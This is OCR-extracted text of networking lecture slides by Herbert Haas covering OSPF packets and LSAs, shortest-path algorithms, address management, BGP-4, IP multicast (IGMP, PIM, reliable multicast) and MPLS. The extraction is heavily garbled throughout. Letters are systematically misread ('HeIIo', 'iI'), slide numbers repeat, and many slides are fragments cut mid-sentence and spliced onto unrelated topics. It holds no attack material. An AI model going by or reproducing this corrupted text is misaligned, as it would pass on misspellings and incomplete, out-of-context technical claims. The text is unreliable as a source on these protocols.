ages the younger the better but only iI the age diIIerence between the recently
received LSA is greater than MaxAgeDiII; otherwise both LSAs are considered to
be identical.
4 {C} Herbert Haas 2005/03/11
LS Age
Originating router sets LS age = 0 seconds
Increased during fIooding by InfTransDeIay by
every router
AIso increased whiIe stored in database
Age is never incremented past MaxAge (60 min)
LSAs having MaxAge:
Are not used in routing tabIe caIcuIation anymore
Neighboring router ID
Metrics
6
6 {C} Herbert Haas 2005/03/11
Network LSA - Type 2
DR's IP address
One Subnet mask for this broadcast
segment
List of Router-IDs of aII routers in the
broadcast segment
7
7 {C} Herbert Haas 2005/03/11
Network Summary LSA - Type 3
Originated by ABRs onIy
Each LSA Type 3 contains a number of
Metric
9
9 {C} Herbert Haas 2005/03/11
AS ExternaI LSA - Type 5
Originated by ASBRs
ExternaI type 1
ExternaI routes
DefauIt route
Contains
Metric
For MOSPF
ExternaI Attribute LSA (8)
AIternative to IBGP
Area-IocaI scope
Opaque LSA (11)
AS scope
Opaque LSAs are e. g. used as load indication messages with MPLS.
13
13 {C} Herbert Haas 2005/03/11
GeneraI OPSF Packet Structure
Carried directIy in IP (protocoI number 89)
AII OSPF packets begin with a 24-byte OSPF
packet header
Version = 2 Type
Router ID of originating router
OSPF Packet Length
Area ID of originating area
Checksum Authentication Type
Authentication
Authentication
Packet Data
(HeIIo, Database Description, LS Request, LSU, LS Ack)
32 bits
1. HeIIo
2. Database Description
3. Link State Request
4. Link State Update
5. Link State ACK
2
4
b
y
t
e
s
The OSPF version we use today is version 2. The packet type identiIies the
actual OSPF message type that is carried in the packet data area at the bottom.
The OSPF packet length describes the number oI bytes oI the OSPF packet
including the OSPF header. Router and Area IDs identiIy the originator oI this
packet. II a packet is sent over a virtual link, the Area ID will be 0.0.0.0, because
virtual links are considered part oI the backbone area. The checksum is calculates
over the entire packet including the header.
Three authentication types had been deIined:
0 No authentication
1 Simple clear text password authentication
2 MD5 Checksum
II the Authentication Type 1, then a 64 bit clear text password is carried in the
authentication Iields. II the Authentication Type 2, then the authentication
Iields contain a key-ID, the length oI the message digest, and a nondecreasing
cryptographic sequence number to prevent replay attacks. The actual message
digest would be appended at the end oI the packet.
The eIIiciency oI routing updates also depends on the maximum transIer unit
(MTU) deIined. Cisco deIined a MTU oI 1500 bytes Ior OSPF.
14
14 {C} Herbert Haas 2005/03/11
HeIIo Packet
Network Mask of originating interface
Options HeIIo IntervaI Router Priority
Router Dead IntervaI
Designated Router
Backup Designated Router
Neighbor #1
Neighbor #n
.
Must match with
receiving interface
In seconds. Must match!
(10 secs on LAN, 30 secs on
non-broadcast networks)
N/P 0 0 DC EA MC E T
OSPF Demand Circuits supported
ExternaI Attributes LSAs supported
NSSA ExternaI LSAs supported
TransIate LSA7 to LSA5
(carried in LSA7 onIy)
Options
MOSPF supported
AS ExternaI LSAs supported
ToS supported
To ensure compatibiIity
Used to eIect
DR and BDR
"manuaIIy"
(0-255)
Seconds
before
neighbor is
decIeared dead.
Must match!
(4 x heIIo intervaI)
IP address of
interface of
DR
IP address of
interface of
BDR
Type 1
The network mask must match the mask on the receiving interIace, ensuring that
they share a segment and network.
The Options Iield is also used by other message types. II the Router Priority is set
to zero this router cannot become DR or BDR.
Note that the Iields "Designated Router" and "Backup Designated Router" only
contain the interIace IP address oI the DR or BDR on that network, not the router
ID !!
II these numbers are unknown or not necessary (other network type) then these
Iields are set to 0.0.0.0.
It is important to know that neighbors must have conIigured identical Hello and
Dead Intervals.
15
15 {C} Herbert Haas 2005/03/11
Database Description Packet
DD Sequence Number
Interface MTU 0 0 0 0 0 I M
Options
LSA Headers
Size of the Iargest IP packet
that can be sent without fragmentation
Same definition as for
the HeIIo Packet
Marks the initiaI packet
of a series of DD packets
More DD
packets
wiII foIIow
Master=1
SIave=0
To ensure
that the
fuII sequence
of DD packets
are received
Type 2
AIso caIIed "DDP"
The DD sequence number is set by the master to some unique value in the Iirst
DD packet. This number will be incremented in subsequent packets.
16
16 {C} Herbert Haas 2005/03/11
Link State Request Packet
Link State Type
Link State ID
Advertising Router
Link State Type
Link State ID
Advertising Router
Link State Type
Link State ID
Advertising Router
.....
Which type of LSA is
requested (Router LSA,
Network LSA, ...)
Usage depends
on the LSA type
Router ID of
originator
of this LSA
Type 3
Note that the Link State Request Packet uniquely identiIies the LSA by Type, ID,
and advertising router Iields oI its header. It does not include the sequence
number, checksum, and age, because the requestor is not interested in a speciIic
instance oI the LSA but in the most recent instance.
17 {C} Herbert Haas 2005/03/11
Link State Update Packet
LSAs
Number of LSAs
LSUs contain one or more LSAs (limited by MTU)
Used for flooding and response to LS requests
LSUs are carried hop-by-hop
Type 4
18 {C} Herbert Haas 2005/03/11
Link State ACK Packet
LSA Headers
Each LSA received must be explicitely acknowledged
reliable flooding!
Acknowledged LSA is identified by LSA header
Single Link State ACK packet can acknowledge
multiple LSAs
The LS ACK packet consists
onIy of a Iist of LSA headers
(and an OSPF header of course)
Type 5
19
19 {C} Herbert Haas 2005/03/11
The LSAs
Link State ID
Age Options LSA Type
Router ID of Advertising Router
Sequence Number
Checksum Length
LSA Body
Same definition as for
the HeIIo Packet
LSA
Header
These three fieIds
uniqueIy identify
every LSA
Time in seconds since
this LSA was originated.
Incremented at each router.
Usage depends
on LSA Type
Incremented each time
a new instance of the
LSA is originated
CaIcuIated over whoIe
LSA except Age fieId
Number of bytes
of LSA header + body
All LSAs have the LSA header at the beginning. This LSA header is also used in
Database Description and Link State Acknowledgement packets.
The Age is incremented by InfTransDelay seconds at each router interIace this
LSA exits. The Age is also incremented in seconds as it resides in a link state
database.
The Options Iield describes optional capabilities supported at that topological
portion described by this LSA.
The LSA Type describes which inIormation is carried in the LSA Body. Here
the structural diIIerences between Router LSAs, Network LSAs, etc. are
identiIed.
The Link State ID is used diIIerently by the LSA types. Basically this Iield
contains some inIormation identiIying the topological portion described by this
LSA. For example a Router ID or an interIace address is used here. The
Iollowing slides will explain this Iield Ior each LSA type.
The Router ID identiIies the originating router oI this LSA.
The Sequence Number helps routers to identiIy the most recent instance oI this
LSA.
The Checksum is a so-called 8 bit Fletcher checksum, providing more protection
than traditional checksum methods such as used Ior TCP. The Iirst eight bits
contain the 1's complement sum oI all octets, while the second eight bits contain a
high-order sum oI the running sums. See RFC 1146 Ior more details.
20
20 {C} Herbert Haas 2005/03/11
Router LSA
Link State ID = Advertising Router ID
Age Options LSA Type = 1
Router ID of Advertising Router
Sequence Number
Checksum Length
IdenticaI
Number of Links 0 0 0 0 0 V E B 0 0 0 0 0 0 0 0
Link ID
Link Data
Link Type Number of ToS Metric
ToS ToS Metric 0 0 0 0 0 0 0 0
One ToS
metrc for
each ToS
...
Link ID
Link Data
Link Type Number of ToS Metric
ToS ToS Metric 0 0 0 0 0 0 0 0
ToS ToS Metric 0 0 0 0 0 0 0 0
1st Link
2nd Link
LSA
Header
Router LSAs are generated by all OSPF routers and must describe all links oI the
originating router!
The V-bit (Virtual Link Endpoint) is set to one iI the originating router is a
virtual link endpoint and this area is a transit area. The E-bit (External) is set iI
the originating router is an ASBR. The B-bit (Border) is set iI the originating
router is an ABR.
The Link ID and Link Data depend on the Link Type Iield which describes the
general type oI connection the link provides.
Link Tvpe 1 is a point-to-point link, the Link ID describes the Neighbor Router ID and the Link
Data Iield contains the IP address oI the originating router's interIace to the network.
Link Tvpe 2 is a link to a transit network, the Link ID describes the interIace address oI the
Designated Router and the Link Data Iield contains the IP address oI the originating router's
interIace to the network.
Link Tvpe 3 is a link to stub network, the Link ID describes the IP network number or subnet
address and the Link Data Iield contains the network's IP address or subnet mask.
Link Tvpe 4 is a virtual link, the Link ID describes the neighboring router's Router ID and the Link
Data contains the MIB-II iIIndex value Ior the originating router's interIace.
Number of ToS speciIies the number oI ToS Metrics listed Ior this link. For
each ToS an additional line is appended to this link state section. Generally, ToS
is not used today anymore and the Number oI ToS Iield is set to all-zero.
Metric is the cost oI the interIace that established this link.
21
21 {C} Herbert Haas 2005/03/11
Network LSA
Link State ID = IP address of DR's interface to this network
Age Options LSA Type = 2
Router ID of Advertising Router
Sequence Number
Checksum Length
LSA
Header
Network Mask
Attached Router
Attached Router
..
Network LSAs are originated by DRs and describe the multi-access network and
all routers attached to it, including the DR.
22
22 {C} Herbert Haas 2005/03/11
Network Summary LSA
Link State ID = IP address of advertised network
Age Options LSA Type = 3
Router ID of Advertising Router
Sequence Number
Checksum Length
LSA
Header
Network Mask
Metric 0 0 0 0 0 0 0 0
ToS Metric ToS
...
f a default route is advertised, both the Link State D
and the Network Mask fields will be 0.0.0.0
Also used for route summarization
Note: Cisco only supports ToS=0
OptionaI
A Network Summary LSA is originated by an ABR and advertises networks
external to an area.
23
23 {C} Herbert Haas 2005/03/11
ASBR Summary LSA
Link State ID = Router ID of ASBR being advertised
Age Options LSA Type = 4
Router ID of Advertising Router
Sequence Number
Checksum Length
LSA
Header
0.0.0.0
Metric 0 0 0 0 0 0 0 0
ToS Metric ToS
OptionaI
...
Note: Cisco only supports ToS=0
A ASBR Summary LSA is originated by an ABR and advertises ASBRs external
to an area.
24 {C} Herbert Haas 2005/03/11
Autonomous System ExternaI LSA
Link State ID = IP address of destination
Age Options LSA Type = 5
Router ID of Advertising Router
Sequence Number
Checksum Length
LSA
Header
Network Mask
E 0 0 0 0 0 0 0 Metric
Forwarding Address
ExternaI Route Tag
E ToS Metric
Forwarding Address
ExternaI Route Tag
ToS
...
OptionaI
When describing a default route, both the Link State
D and the Network Mask are set to 0.0.0.0.
Metric
types
E1 and
E2
Next hop
(0.0.0.0
if ASBR
is next
hop)
Not used
by OSPF
25 {C} Herbert Haas 2005/03/11
NSSA ExternaI LSA
Same structure as AS ExternaI LSA
Forwarding address is
Can be infinite
p with c(p) = d(v,v') is caIIed shortest path
sp(v,v')
SPs are easier to calculcate Ior distance graphs where the costs are only positive.
5 {C} Herbert Haas 2005/03/11
Definitions
SeIect start vertex s
Three sets of vertices:
FIoyd-WarshaII aIgorithm
A* aIgorithm
Extends SPF with a estimation function to enhance
performance in certain situations
The SPF algorithm is oI 'greedy type. Dijkstra originally proposed to treat the
boundary vertices like outside vertices, thereIore no explicit data structure is
needed Ior the boundary vertices. This implementation is eIIicient Ior graphs
with lots oI edges but not eIIicient with so-called "thin" graphs. One oI the best
implementations use Fibonacci heaps Ior boundary representation.
Alternative algorithms are Ior example the Bellman-Ford or the Floyd-Warshall
algorithm, which bases on Belman`s optimization principle ('iI the shortest path
Irom A to C runs over B, then the partial path AB must also be the shortest
possible).
10
10 {C} Herbert Haas 2005/03/11
About E. W. Dijkstra
Born in 1930 in Rotterdam
Degrees in mathematics and theoreticaI
physics from the University of Leyden
and a Ph.D. in computing science from
the University of Amsterdam
Paper notebook
Internet Registry (IR) became part of IANA
PosteI passed his task to SRI InternationaI
RFC 791
CIass B exhaustion
RFC 1654
RFC 1519 introduced Classless Inter-Domain Routing (CIDR): an Address
Assignment and Aggregation Strategy
RFC 1654 a draIt standard Ior BGP 4
RFC 1771 a standard Ior BGP - 4
12
12 {C} Herbert Haas 2005/03/11
Address Management
ISPs assign
contiguous blocks of
contiguous blocks of
contiguous blocks ...
of addresses to their customers
Aggregation at borders possibIe !
Tier I providers fiIter routes with
prefix Iengths Iarger than /19
RIPE NCC
APNIC
ARIN
RFC 1174 IAB Recommended Policy on Distributing Internet IdentiIier
Assignment.
This RFC represents the oIIicial view oI the Internet Activities Board (IAB), and
describes the recommended policies and procedures on distributing Internet
identiIier assignments and dropping the connected status requirement.
14
14 {C} Herbert Haas 2005/03/11
RIRs
RIPE NCC (1992)
Africa
LACNIC
Recent assignments
(check IANA website)
The Class A addresses assignment is controled by the IANA.
19
19 {C} Herbert Haas 2005/03/11
CIass B Assignment
IANA and RIRs requirements
Was cIassfuI
RFC 1267
BGP-4
CIassIess
RFC 1771
BGP is a distance vector protocol. This means that it will announce to its
neighbors those IP networks that it can reach itselI. The receivers oI that
inIormation will say 'iI that AS can reach those networks, then I can reach them
via it.
II two diIIerent paths are available to reach one and the same IP subnet, then the
shortest path is used. This requires a means oI measuring the distance, a metric.
All distance vector protocols have such means. BGP is doing this in a very
sophisticated way by using attributes attached to the reachable IP subnet.
BGP sends routing updates to its neighbors by using a reliable transport. This
means that the sender oI the inIormation always knows that the receiver has
actually received it. So there is no need Ior periodical updates or routing
inIormation reIreshments. Only inIormation that has changed is transmitted.
The reliable inIormation exchange, combined with the batching oI routing
updates also perIormed by BGP, allows BGP to scale to Internet-sized networks.
3
3 {C} Herbert Haas 2005/03/11
BGP-4 at a GIance
Carried within TCP
Using attributes
A router which has received reachability inIormation Irom a BGP peer, must be
sure that the peer router is still there. Otherwise traIIic could be routed towards a
next-hop router that is no longer available, causing the IP packets to be lost in a
black hole.
TCP does not provide the service to signal that the TCP peer is lost, unless some
application data is actually transmitted between the peers. In an idle state, where
there is no need Ior BGP to update its peer, the peer could be gone without TCP
detecting it.
ThereIore, BGP takes care oI detecting its neighbors presence by periodically
sending small BGP keepalive packets to them. These packets are considered
application data by TCP and must thereIore be transmitted reliably. The peer
router must also, according to the BGP speciIication, reply with a BGP keepalive
packet.
4
4 {C} Herbert Haas 2005/03/11
Path Vector ProtocoI
Metric: Number of AS-Hops
AII traversed ASs are carried in the
AS-Path attribute
Attributes
Routing TabIe caIcuIated from BGP
Database
CPU/Memory resources needed
The designers oI the BGP protocol have succeeded in creating a highly scalable
routing protocol, which can Iorward reachability inIormation between
Autonomous Systems, also known as Routing Domains. They had to consider an
environment with an enormous amount oI reachable networks and complex
routing policies driven by commercial rather than technical considerations.
TCP, a well-known and widely proven protocol, was chosen as the transport
mechanism. That decision kept the BGP protocol simple, but it put an extra load
on the CPU or the routers running BGP. The point-to-point nature oI TCP might
also introduce a slight increase in network traIIic, as any update that should be
sent to many receivers has to be multiplied into several copies, which are then
transmitted on individual TCP sessions to the receivers.
Whenever there was a design choice between Iast convergence and scalability,
scalability was the top priority. Batching oI updates and the relative low
Irequency oI keepalive packets are examples where convergence time has been
second to scalability.
6
6 {C} Herbert Haas 2005/03/11
Some Interesting Numbers
Today's Internet BGP Backbone
Routers are burdened
ConnectionIess nature of IP
Mitigated through
Community attribute
Peer groups
There are still some limitations in BGP. It is impossible to implement source
address-based policies with BGP (unless supported by vendor speciIic
techniques). Furthermore BGP is still hop-by-hop routing, that is, the
connectionless nature oI IP makes it impossible to Ioresee what the next routers
will do with the route.
9
9 {C} Herbert Haas 2005/03/11
Neighborship EstabIishment
Open Message
AS number
HoId Time
ProbIems are indicated with Notification
message
AS 1
AS 2
Open
Open
Net 11
Net 12
Net 48
Net 49
Net 11
Net 12
Net 48
Net 49
The BGP protocol is carried in a TCP session, which must be opened Irom one
router to the other. In order to do so, the router attempting to open the session
must be conIigured to know to which IP address to direct its attempts.
10
10 {C} Herbert Haas 2005/03/11
NLRI Update
After open message, aII known routes are
exchanged using update messages
Contains network Iayer reachabiIity
information (NLRI)
19 Bytes
IBGP: 200
n(n-1)/2 links
Resource and
configuration
challenge
Solutions:
Route Reflectors
Confederations
Note: These are IogicaI IogicaI IBGP connections!
The physicaI topoIogy might Iook different!
Every BGP router maintains IBGP sessions with all other internal BGP routers oI
an AS. Obviously, this Iully meshed approach does not scale, especially it
becomes a resource and manageability problem iI the number oI BGP sessions in
one router exceeds 100.
Remember that each BGP session corresponds to a TCP connection, which
requires a lot oI system resources. Additionally BGP sessions must be manually
established, so a Iully meshed environment is also a conIiguration problem. This
is also the reason, why BGP cannot replace traditional IGPs in "normal"
autonomous systems. ISPs demand Ior Iast BGP convergence and do not need
IGP in general.
Generally, there are two solutions to circumvent this problem: Route ReIlectors
and ConIederations. Both techniques are discussed in the next slides.
9
9 {C} Herbert Haas 2005/03/11
Route RefIector
RR
CIient
CIient
CIient
CIient
CIient
RR mirrors BGP
messages for
"clients"
RR and clients
belong to a
"cluster"
Only RR must be
configured
ORIGINATOR_ID
Contains router-id of the route's originator in the IocaI AS;
attached by RR (OptionaI, Non-Trans.)
CLUSTER_LIST
Sequence of cIuster-ids; RR appends own cIuster-id when
route is sent to non-cIients outside the cIuster
(OptionaI, Non-Transitive)
It is important to know that RRs preserve IBGP attributes. Even the NEXTHOP
remains the same, otherwise routing loops might occur. Imagine two clusters
whose RRs are logically interconnected via IBGP but physically via clients. II
one oI these RRs learns about a NLRI Irom the other RR, this RR would reIlect
that inIormation to its clients also to that client who Iorwarded this NLRI
inIormation to this RR.
Obviously the NEXTHOP attribute must remain the same, that is pointing to the
RR oI the other cluster and not to the local RR, because there is no physical
connection between the RRs.
II a RR learns the same NLRI Irom multiple client peers, only one path will be
propagated to other peers. ThereIore, when RRs are used, the number oI path
available to reach a given destination might be lower than that oI a Iully-meshed
approach. Thus, suboptimal routing can only be avoided iI the logical topology
maps the physical topology as close as possible.
12
12 {C} Herbert Haas 2005/03/11
Redundant RRs
RR
RR
RR is single
point of failure
Best scaIabiIity
Confederations drawbacks
No Congestion Avoidance!
Shared Trees
IP Multicast routing has been developed in the late 1980s and had a great
impact on QoS research in the Internet. RSVP and RTP serve as helper
protocol Ior IP Multicast, which is Iully UDP based and thereIore lacks
congestion avoidance and error recovery.
All multicast methods can be classiIied according to their type oI distribution
tree. Either "Shortest Path Trees" (SPT) or "Shared Trees" are used. These
are explained next.
It might be interesting to know that the Iirst notable use oI IP multicast was
during the IETF conference in 1992 where the whole conIerence (video and
audio) had been multicasted.
7
7 {C} Herbert Haas 2005/03/11
How IP MuIticast Works...
Sources don't care at aII!
SimpIy send muIticast packets to the first-hop router
First-hop router
Based on tunneIs
ConnectionIess environment
QoS
OnIy point-to-point !
CIient-Server based
Across domains
Group range: 232.0.0.0/8
232.0.0.0 to 232.255.255.255
The increasing demand Ior interdomain multicast routing led to some interim
solutions such as GLOP. But GLOP addressing is restricted to the last byte,
which results in 255 uniquely identiIied groups only.
When the sources (senders) have to be globally known, a special range oI
multicast addresses can be used Ior those servers. Additionally the specialized
multicast protocol called "Source SpeciIic Multicast (SSM)" can be used,
which supports building the distribution tree at the source Ior any group
address Irom the range 232.0.0.1 232.255.255.255.
DeIined in IETF draIt "draIt-holbrook-ssm-00.txt".
23
23 {C} Herbert Haas 2005/03/11
Dynamic MuIticast Addressing
Method of SDR (Mbone)
Not scaIabIe
MuIticast Address Set-CIaim (MASC)
HierarchicaI concept
Under deveIopment
The Session Directory (SDR) is an important application Ior the Mbone. SDR
detects collisions when creating new sessions and switch to an unused address.
This method was suIIicient in the old Mbone but today the increasing number
oI sessions revealed that this method does not scale well.
MASC is a new proposal Ior a dynamic multicast address allocation that is
being developed by the Multicast-Address Allocation (malloc) Working Group
oI the Internet Engineering Task Force (IETF).
MASC requires domains to lease IP multicast group address space Irom their
parent domain. These leases are good Ior only a set period. It is possible that
the parent domain may grant a completely diIIerent range at lease renewal time
because oI the need to reclaim address space Ior use elsewhere in the Internet.
This task is indeed very complex!
MASC is part oI the hierarchical Multicast Address Allocation Architecture
(MAAA) and represents the top level oI this architecture. When a certain range
oI multicast addresses is allocated at the top level, the underlying hierarchies
use additional protocols Ior address assignment. Within a domain (AS or
service provider) the Address Allocation Protocol (AAP) is used. The
Multicast Address Dynamic Client Allocation Protocol (MADCAP) is
merely a modiIied DHCP and allows address assignment at leaI segments Ior
the multicast sources. Servers Ior address allocation within the MAAA
architecture are called Multicast Address Allocation Servers (MAAS).
See "draft-ietf-malloc-masc-01.txt" Ior detailed MASC principles.
24
24 {C} Herbert Haas 2005/03/11
IGMP
25
25 {C} Herbert Haas 2005/03/11
Internet Group Membership ProtocoI
Used (mainIy) by hosts
To teII designated routers about desired group membership
Supported by nearIy aII operating systems
IGMP Version 1
"I want to receive (*, G)"
SiIIy: Leaving group onIy by being siIent...
Specified in RFC 1112 (oId)
IGMP Version 2
AIso: "I do not want to receive this any Ionger"
Specified in RFC 2236 (current)
IGMP Version 3
"I want to receive (S, G)"
DR can directIy contact source
StiII under deveIopment
The Internet Group Management Protocol (IGMP) is primarily used by hosts to
tell the DR about their desire to receive multicast traIIic. Upon receiving
IGMP messages the DR may retrieve the speciIied multicast by joining the
MDT.
IGMP is carried directly within IP using protocol number 2.
The initial specification for IGMP (now considered as v1) was documented
in RFC 1112 ("Host Extensions Ior IP Multicasting", August 1989, StanIord
University). Soon several shortcomings oI IGMPv1 had been discovered (e. g.
hosts leave group by not responding) and this led to the development oI
IGMPv2.
To tell the whole truth: IGMP Version 0 had been speciIied in RFC 988 and
obsoleted by RFC 1112.
Using IGMPv2, hosts can send leave message to the router. The router
immediately sends a query in order to check iI there is really no host wanting to
be a member oI this group. II there is no answer within three seconds (!) the
group is pruned Irom the multicast tree. IGMPv2 was ratiIied in November
1997 in RFC 2236 ("Internet Group Management Protocol, Version 2" by
Xerox PARC).
IGMPv3 is still under development. Please check out draIt-ietI-idmr-igmp-
v3-??.txt ...as things change quickly...
26
26 {C} Herbert Haas 2005/03/11
IGMP
DR send every 60-120s Host Membership queries to
224.0.0.1
TeIIing aII active groups to IocaI receivers
Interested hosts send IGMP "report"
With destination address = group address !
Countdown-based, TTL=1
224.1.1.1 224.1.1.1 224.1.1.1 224.1.1.1 224.1.1.1
Periodic
"Host Membership Query"
to 224.0.0.1 ("AII Hosts")
OnIy one member repIies
with a "report" message
The basic principle is this:
The designated router sends periodically a "Host Membership Query" using the
destination address oI 224.0.0.1 ("all hosts"). Note: The TTL is set to 1.
Upon receiving a "Host Membership Query" Irom the router each host starts a
countdown for each group it is member oI. The countdown is initialized by a
random value (IGMP v1: something between 0 and 10 seconds).
Any host reaches the zero value Iirst sends a "Host Membership Report
Message". Again the TTL is set to 1. Any other host oI this group can
immediately cancel its countdown and does not need to reply. This method saves
bandwidth and processing by the hosts.
Using IGMPv1, hosts leave group simply by not responding. The DR sends
three query messages (one every 60 seconds) and iI no host replies this subnet is
pruned Irom the multicast tree. This is indeed silly because during 3 minutes the
whole LAN is Ilooded with unwanted multicast traIIic.
Using IGMPv2, hosts can send leave message to the router. The router
immediately sends a query in order to check iI there is really no host wanting to
be a member oI this group. II there is no answer within 3 seconds (!) the group is
pruned Irom the multicast tree.
Note: Join messages can be also sent immediately without being queried by the
DR in advance ("asynchronous joins").
27
27 {C} Herbert Haas 2005/03/11
Other Important Differences
IGMPv1
Good question...
37
37 {C} Herbert Haas 2005/03/11
IGMP Snooping
Switches must decode IGMP
Provided by RTCP
Determine if
outgoing Iink is on
upstream path for
the next router
Avoids any
dupIicates
20.0.0.1
224.0.0.1
RPF Check
faiIed
RPF can be enhanced by looking "one step ahead". That is, duplicate
packets can be avoided iI packets are only Iorwarded on links which are
upstream to the next router. This can easily calculated using a link state
protocol.
Cisco routers perIorm a RPF check every 5 seconds by deIault.
A so-called "Outgoing Interface List" (OIL), contains interIaces pointing
to
Multicast neighbors
Receivers
Administrative pre-conIigured interIaces
Using the OIL allows a quick decision on which interIaces the packet
should be Iorwarded. II the OIL list is empty, then a "Prune" message is
sent to the upstream router.
51
51 {C} Herbert Haas 2005/03/11
MuIticast Scoping using TTL
Packet's TTL is decremented by 1 when packet
arrives at incoming interface
Then the packet is forwarded according OIL
which aIso contains TTL threshoIds per interface
In both directions!
When TTL scoping is used together with broadcast and prune multicast
protocols, any router discarding multicast packets cannot prune any upstream
source anymore. Additionally, TTL-based multicast scoping does not support
overlapping zones.
Address scoping allows to establish "administrative" multicast boundaries
based on the group address. This method is much more Ilexible than TTL
scoping. Any multicast packet that does not match an ACLwhich must be
speciIiedis dropped, no matter Irom which direction the packet came.
Overlapping zones are now possible to implement and requires to use
diIIerent address spaces within those zones. However, this might result in a
complex administration task.
53
53 {C} Herbert Haas 2005/03/11
Administrative Boundaries
Company Network
239.200.x.x
Management
239.195.x.x
Engineering
239.195.x.x
Marketing
239.196.x.x
239.192.0.0/10
239.195.0.0/16
239.196.0.0/16
239.1.x.x 239.1.x.x
SeriaI0: Administrative boundary
for aII 239.1.0.0/16 packets
As shown in the picture at the top, multicast packets Ior a speciIied group
address (or range, as ACLs are used) cannot pass this interIace in neither
direction.
The bottom example shows how three administrative domains can be
multicast-isolated Irom each other but it is still possible to receive the
company's multicast 239.200.x.x anywhere within its boundaries.
Additionally it can be seen (look at the management and engineering clouds)
that several zones can use the same address boundaries.
56
56 {C} Herbert Haas 2005/03/11
Shared Tree
(*, G) = (*, 224.1.1.1) and (*, 224.2.2.2)
30.0.0.3
20.0.0.2
Rendezvous
Point (RP)
Shared Tree
224.1.1.1 224.1.1.1 224.1.1.1
224.2.2.2 224.2.2.2 224.2.2.2
Shared trees utilize a so-called "Rendezvous Point" (RP), which distributes
multicast traIIic to its attached receivers. The idea is similar as the
supermarket principle: "Customers should not have to visit every manuIacturer
but rather buy everything at the shop around the corner."
In this sense, the RP acts as supermarket and oIIers multicast traIIic Irom
several sources. Typically, each RP is a leaf of a SPT, which is rooted at a
source. That is, the shared tree principle is mostly used in combination with a
SPT.
Shared trees consume memory oI order O(G) but might result in sub-optimal
paths Irom the source to all receivers. Furthermore they may introduce extra
delay. Thus, only a clever combination oI both SPT and shared trees might be
most eIIicient. As explained later in this chapter, this led to the development
oI "PIM-SM".
57
57 {C} Herbert Haas 2005/03/11
MuIticast Routing
ProtocoIs
Until now, the student should have noticed, that multicast-enabled routers
maintain so-called (S, G) and (*, G) entries in their mroute table.
(S,G) entries: For this particular source S sending to this particular group G,
traIIic is Iorwarded via the shortest path Irom the source.
(`,G) entries: For any (*) source sending to this group G, traIIic is Iorwarded
via a meeting point Ior this group.
58
58 {C} Herbert Haas 2005/03/11
MuIticast ProtocoI Types
Dense Mode: Push method
Infinity = 32 hops
Creates Truncated Broadcast Trees (TBTs)
To compare administrative
distance and metric to source
If assert vaIues are equaI,
the highest IP address wins
Packets are
received on
muIti-access
oiIist interfaces
Assert 120:3
Assert 120:2
Okay, you won!
I wiII prune
my interface...
Sweet! I wiII
serve this LAN
segment...
The PIM assert mechanism is used to eliminate duplicate Ilows on the same
multi-access segment. Other than DVMRP (which establishes a TBT in
advance using a dedicated multicast routing protocol), the assert mechanism is
only perIormed when duplicate packets appear on this link.
When a router receives a (S, G) packet via a multi-access interface which is
listed in the (S, G) oilist, then it will send an assert message, telling the other
router a so-called assert value.
The assert value contains both the administrative distance oI this router and
the metric toward the source. The administrative distance is evidentially the
high-order part oI this assert value. Obviously the other router sends also an
assert message.
Now both routers compare these values to determine who has the best path (i.
e. lowest value) to the source. II both values are the same, the highest IP
address is used as tiebreaker. Losing routers prune their interIace, whereas the
winning router continues to Iorward multicast traIIic onto the LAN segment.
74
74 {C} Herbert Haas 2005/03/11
PIM-SM
ProtocoI Independent
Or IGMPv3 Iite
Border routers
Other AS's RP
If MSDP peer is a RP and has a (*, G) entry
Sequence
ReIiabIe muIticast requires UDP-based
acknowIedgements
TCP cannot do muIticast by nature (too much overhead,
state variabIes, buffers, timers, ...)
Security issues for financiaI data deIivery etc.!!!
Best eIIort delivery results in occasional packet drops. Many real-time
multicast applications such as video and audio streaming may be aIIected by
these losses. On the other hand it is clearly useless to request retransmissions oI
each lost data.
However, some compression algorithms may be severely aIIected by even low
drop rates; this causes the picture to become jerky or to Ireeze Ior several
seconds while the decompression algorithm recovers.
Duplicate packets may occasionally be generated as multicast network
topologies change.
96
96 {C} Herbert Haas 2005/03/11
ReIiabIe MuIticast (2)
Guaranteed data deIivery is provided by
reIiabIe muIticast protocoIs
StiII UDP based of course
Repair cycIes
ScaIabIe ReIiabIe MuIticast (SRM)
Unicast
ACKs couId be sent but are typicaIIy
turned off to reduce traffic
Unknown members
No registration expected
MFTP allows the multicast service provider to deIine three diIIerent types oI
groups.
All members oI a closed group must be known by the source. This model
allows Ior dedicated authorization and is typically applied only Ior a small
number oI receivers. Here the source speciIies the receivers within the
announcement.
Members oI an open limited group are not speciIied by the announcement.
Any receiver may join the source but must register to the source. The number
oI receivers is typically limited.
Members oI an unlimited group do not need to register and even the source
sends no announcements at all. There are no limits in group size.
106
106 {C} Herbert Haas 2005/03/11
SRM
For whiteboarding (wb) in Mbone and generaI
data distribution
Independent of Iayer 3
To confirm to MTU
FEC
Routing
Forwarding
In other words: The "IP Routing Paradigm
"
Hop-by-hop routing (sIow)
Destination based routing (Large routing tabIes)
Least cost routing (no Ioad baIancing)
ATM: Layer 2 and 3 topoIogies often
different (hub & spoke)
ManuaI VC estabIishment necessary
TE?
QoS?
VPN?
Transport?
ATM-Switch IP-Router
Destination based least cost IP routing does not support load balancing.
Although policy based routing is supported by most vendors this solution does
not scale. Also there are no satisIying solutions available Ior TaIIic
Engineering (TE) and Quality oI Service (QoS). Indeed there are some working
IP VPN solutions (e. g. IPSec based) but it is still a scalability issue.
6
6 {C} Herbert Haas 2005/03/11
MPLS Idea
MPLS is a provider technoIogy
AppIication: Transport network!
Inside versus border versus outside domains:
Core routers
Provider Edge routers (PE-routers)
MPLS TE (tunneI/destination)
MPLS is basically a software solution. With Cisco IOS version 12.0, routers
are able to perIorm CEF switching (explained soon in detail), which is the
basis Ior MPLS. That is, nearly any Cisco router (except the smallest home
oIIice devices) are able to do MPLS.
MPLS routers are also called "Label Switch Routers" (LSRs) and must be
able to perIorm the Iollowing basic operations: Insert (or "impose") a label
(this is essential Ior edge routers), remove (or "pop") a label (this is essential
Ior last hop routers), and swap labels (this is always done during packet
Iorwarding).
Several reasons lead to a label stack. For example, with MPLS VPNs, the top
label identiIies the egress router while a second label identiIies the VPN itselI.
Thus the egress router can (as soon as the packet arrived) pop the outermost
label and Iorward the packet to the right interIace according to the inner label.
Another example is MPLS Traffic Engineering (TE), where the outer label
points to the TE tunnel endpoint and the inner label to the Iinal destination
itselI.
12
12 {C} Herbert Haas 2005/03/11
Important Concepts
LDP (RFC) or TDP
(Cisco)
CEF is required
(Cisco Patent)
Routing tabIe is
256-way "mtrie"
Better than Fast
Switching: AIso 1st
Packet fast!
DCEF = per
interface
